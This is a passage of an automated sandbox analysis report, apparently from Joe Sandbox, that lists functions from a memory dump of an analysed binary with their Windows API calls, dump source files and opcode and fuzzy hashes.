                              • wsprintfA.USER32 ref: 003B2BCE
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 7a4e8e18457b98826d93d1cd9c3d996455a1b1719add9d4ac7fc29c8c6775fb5
                              • Instruction ID: ab218757dbacdf8f7a195d36e351499450dfb3ead9e059ef60f57790e523e2b2
                              • Opcode Fuzzy Hash: 7a4e8e18457b98826d93d1cd9c3d996455a1b1719add9d4ac7fc29c8c6775fb5
                              • Instruction Fuzzy Hash: D20140B2904928ABCB149BC9DD49FBFB7BCFB4CB11F00011AF645A2280E7785544D7B5
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000), ref: 003B4492
                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003B44AD
                              • CloseHandle.KERNEL32(00000000), ref: 003B44B4
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B44E7
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                              • String ID:
                              • API String ID: 4028989146-0
                              • Opcode ID: 2f3ea50ce26ab264f0cfc7de52c457a3b444e0d69d9a8d8f9efd96e3e84c878e
                              • Instruction ID: b5d6e7a26b1215cb1cced5a4d49aa5d772173ad7930d88829af495b8661589b6
                              • Opcode Fuzzy Hash: 2f3ea50ce26ab264f0cfc7de52c457a3b444e0d69d9a8d8f9efd96e3e84c878e
                              • Instruction Fuzzy Hash: EAF0FCB1901A152FE7219B759C4DFEA76A8EF14304F054590FB45D7181DBB08C94C7D4
                              APIs
                              • __getptd.LIBCMT ref: 003B8FDD
                                • Part of subcall function 003B87FF: __amsg_exit.LIBCMT ref: 003B880F
                              • __getptd.LIBCMT ref: 003B8FF4
                              • __amsg_exit.LIBCMT ref: 003B9002
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 003B9026
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 96b75ddca664ff2450f6ba1b20c767ec2cb7fe7d0f804c6fbc7d71987d73cc2c
                              • Instruction ID: 7382ef1b91c1852ed503088fc8d08e427c3d74ca490a947f613a04ebbdf6d5aa
                              • Opcode Fuzzy Hash: 96b75ddca664ff2450f6ba1b20c767ec2cb7fe7d0f804c6fbc7d71987d73cc2c
                              • Instruction Fuzzy Hash: D6F096329086109BD763BB785807BDD33A4AF0071CF254109F744EEDD2DF645940DB55
                              APIs
                              • lstrlen.KERNEL32(------,00395BEB), ref: 003B731B
                              • lstrcpy.KERNEL32(00000000), ref: 003B733F
                              • lstrcat.KERNEL32(?,------), ref: 003B7349
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcatlstrcpylstrlen
                              • String ID: ------
                              • API String ID: 3050337572-882505780
                              • Opcode ID: ffbfe33b99542bcd5adce4a2fb5282e4cd167f21bbc8f942a9d8e689f8494d43
                              • Instruction ID: 9488289cdac4ba77054366cbce53cc747427437eb2843772c1b7ca0718d8041f
                              • Opcode Fuzzy Hash: ffbfe33b99542bcd5adce4a2fb5282e4cd167f21bbc8f942a9d8e689f8494d43
                              • Instruction Fuzzy Hash: 3DF0C978911B029FDB259F35D84C927BAF9EFD4B05319882DA89AC7614EB30D840DB50
                              APIs
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A3422
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A344B
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A3471
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A3497
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 286358cd93655a3e10d40df424f551a5e2b407f7edc9be95700345855a922953
                              • Instruction ID: 2fc8fbddb68cb4b5a532f3d992dc062a9ae1bf357d0b2dd7cb313882a3584607
                              • Opcode Fuzzy Hash: 286358cd93655a3e10d40df424f551a5e2b407f7edc9be95700345855a922953
                              • Instruction Fuzzy Hash: 1612DC70A016019FDB1ACF19C558B25B7E5EF46718B2EC0ADE809DB3A2D776DD42CB80
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7C94
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7CAF
                                • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D58
                                • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D76
                                • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: string too long
                              • API String ID: 909987262-2556327735
                              • Opcode ID: 118cadb98ec080921e30d384bc3f09887b3f0638eb5d1e819c483f8e9f6b2714
                              • Instruction ID: c772498fde6478d29b8ae55ce032d06b285169578a41a920402e4112afdb373f
                              • Opcode Fuzzy Hash: 118cadb98ec080921e30d384bc3f09887b3f0638eb5d1e819c483f8e9f6b2714
                              • Instruction Fuzzy Hash: 5D31C7723086149BD736DE6CECC0A6AF7E9EF92770B214A2AF542CB641D7719C4183E4
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 00396F74
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00396F7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcess
                              • String ID: @
                              • API String ID: 1357844191-2766056989
                              • Opcode ID: e4b461a6e1ef86baab11efef2e221eece2f392f4371777f7a70b94cde28c7596
                              • Instruction ID: 0387b8c76cdff3435b16bf5e39f54b16c41d89f025a6257ba0e6676ccbdf35d8
                              • Opcode Fuzzy Hash: e4b461a6e1ef86baab11efef2e221eece2f392f4371777f7a70b94cde28c7596
                              • Instruction Fuzzy Hash: 1D218CB16016019BEF218B20DC86BB673E8EB51704F444868F946CBA84FB79E949C750
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B244C
                              • lstrlen.KERNEL32(00000000), ref: 003B24E9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2570
                              • lstrlen.KERNEL32(00000000), ref: 003B2577
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 9e4dd264b80a248e1647b8afd12f751f28de610151af231e745d7767e6173b2c
                              • Instruction ID: 6205cbe8e8b2b1da1d8aef5ede10ac8065a07ec2742bfb8eb7bfe1bb698a4f64
                              • Opcode Fuzzy Hash: 9e4dd264b80a248e1647b8afd12f751f28de610151af231e745d7767e6173b2c
                              • Instruction Fuzzy Hash: 2181F570E002099BDB25CF95DC44BEFB7B5EF84308F188269E608A7281EB759D46CB94
                              APIs
                                • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000), ref: 0039162D
                                • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 0039164F
                                • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 00391671
                                • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 00391693
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391557
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391579
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                              • lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 73a5790af25f027d40e0401157aa622a4cea4b3bb278c04448db72c3d05fadec
                              • Instruction ID: 01904ea307e1dde8fd86eaecd23b2c0cd12ae68310c2121a6aa96c626e79f25a
                              • Opcode Fuzzy Hash: 73a5790af25f027d40e0401157aa622a4cea4b3bb278c04448db72c3d05fadec
                              • Instruction Fuzzy Hash: CD31B475A11F02AFDB25DF3AC588956BBE5BF89305705492DA896D7B10DB30F811CB80
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 003B15A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B15D9
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B1611
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B1649
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: a886ff0499b175e5f8312ee9ce9a1e2aade1194c56eb71630a9d18168f8a7555
                              • Instruction ID: 0cce8629334bd8ebbe2245fe6109126a56c4822a0a518d3d11f61dcdc6cc7483
                              • Opcode Fuzzy Hash: a886ff0499b175e5f8312ee9ce9a1e2aade1194c56eb71630a9d18168f8a7555
                              • Instruction Fuzzy Hash: 41210874611B029FDB36DF2AD868A17B7F4BF44704B444A1DA886C7A40DB30E811CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 0039162D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039164F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391671
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391693
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 2f0e1f7bbf5a16b3085ab9a2ceb63b5698ab9c9fe71fe9a5558e879f9d0777b6
                              • Instruction ID: fdb6a51a1d243eaf8c7cda645cf9610788089fc3f1524fcfc3857a31251a369e
